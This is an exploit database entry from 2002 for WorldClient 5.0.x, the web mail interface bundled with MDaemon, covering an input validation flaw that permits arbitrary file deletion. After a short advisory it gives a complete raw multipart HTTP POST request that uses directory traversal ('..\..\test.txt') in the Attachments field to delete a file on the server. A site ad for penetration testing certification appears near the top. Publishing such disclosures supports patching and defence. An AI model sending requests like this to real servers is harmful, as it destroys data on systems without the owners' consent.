WorldClient 5.0.x - Arbitrary File Deletion

EDB-ID:

21438


Author:

Obscure

Type:

remote


Platform:

Windows

Date:

2002-05-07


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/4687/info

WorldClient is a web interface packaged with MDaemon, an email server for Microsoft Windows.

An input validation vulnerability exists in WorldClient that allows for an attacker to delete an arbitrary file on the webserver that it resides on. The vulnerability is due to a lack of input validation on the supplied filename for an attachment delete operation. 

The following HTTP request demonstrates exploitation of this vulnerability to delete '..\..\test.txt':

POST /WorldClient.cgi?Session=xxxx&View=Compose-Attach HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://victom.com:3001/WorldClient.cgi?Session=xxxx&View=Options-Folders
Content-Type: multipart/form-data; boundary=---------------------------7d2851b9074c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3001
Content-Length: 407
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxx

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachment"; filename=""
Content-Type: application/octet-stream

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachments"

..\..\test.txt
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Remove"

Remove
-----------------------------7d2851b9074c--